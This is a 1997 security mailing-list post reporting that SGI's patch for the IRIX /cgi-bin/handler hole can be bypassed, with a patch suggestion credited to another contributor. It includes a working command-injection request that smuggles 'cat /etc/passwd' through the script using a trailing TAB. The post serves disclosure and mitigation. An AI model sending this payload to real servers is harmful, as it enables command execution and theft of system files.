IRIX fails to correctly patch /cgi-bin/handler exploit

Date: Thu, 19 Jun 1997 23:06:13 +0300
From: Razvan Dragomirescu <drazvan@kappa.ro>
To: best-of-security@suburbia.net
Subject: BoS:      /cgi-bin/handler - more notes


Hi,

I have had reports that my exploit for SGI's /cgi-bin/handler does not
work on IRIX 6.3 (on O2).  I analyzed the code provided with IRIX
6.3 and they tried to fix it, but they actually DID NOT.

They added a new line to the script:

$doc=~s/\|*$// (in plain English, this means "remove any number of '|'s at
end-of-string"). But guess what. It works just as fine if you put another
TAB character after the "pipe" (so that the "pipe" is not at
end-of-string, the TAB is).

The exploit should read

telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat       /etc/passwd|    ?data=Download
HTTP/1.0

It tricks the script into executing the command anyway.
Now, for those of you who want to patch it somehow, here's the best
solution that has been posted to me (all credits for it go to Wolfram
Schneider <wosch@apfel.de>)

All "open" commands should check if the their argument is really a
filename. You could use:

-f $doc && open (INPUT, $doc)

(Same thing as: if (-f $doc) {open (INPUT, $doc) } , the one written
above is more PERL style)

I'm waiting to hear from you (my thanks to Lamont Grandquist who pointed
out the problem on IRIX 6.3).

So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable.
Anyone on IRIX 6.4? :) (What does it run on BTW?)

Be good.
Razvan
-------------------------------------------------------------------------------
RazvanDragomirescu Organization: KappaNet E-Mail: drazvan@kappa.ro,
drazvan@romania.ro Alternate E-mail: drazvan@iname.com, drazvan@guv.ro,
drazvan@pub.ro, drazvan@lbi.ro Phone: +40-1-6866621 NIC-HANDLE: RD1604
RIPE-HANDLE: RD38-RIPE
NO CARRIER

"Smile, tomorrow will be worse" (Murphy)
-------------------------------------------------------------------------------